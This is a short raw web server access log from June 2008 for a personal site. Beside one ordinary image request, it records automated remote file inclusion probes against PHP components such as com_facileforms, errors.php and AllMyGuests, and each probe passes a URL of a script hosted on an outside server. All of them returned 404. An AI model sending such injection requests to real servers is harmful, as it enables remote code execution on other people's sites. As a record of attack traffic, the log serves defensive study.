71.58.247.228 - - [08/Jun/2008:18:09:02 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
84.19.176.161 - - [08/Jun/2008:18:10:33 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.symbols-larp.com/php/pw.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
84.19.176.161 - - [08/Jun/2008:18:10:34 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.symbols-larp.com/php/pw.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
84.19.176.161 - - [08/Jun/2008:18:10:51 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
84.19.176.161 - - [08/Jun/2008:18:10:51 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
209.51.219.170 - - [08/Jun/2008:18:12:43 -0500] "GET /logs//errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
209.51.219.170 - - [08/Jun/2008:18:12:43 -0500] "GET //errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
195.56.189.33 - - [08/Jun/2008:18:13:22 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.56.189.33 - - [08/Jun/2008:18:13:23 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
66.96.219.229 - - [08/Jun/2008:18:13:32 -0500] "GET /logs//errors.php?error=http://www.hobbi.iv-fr.net/forum2/files/licence.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
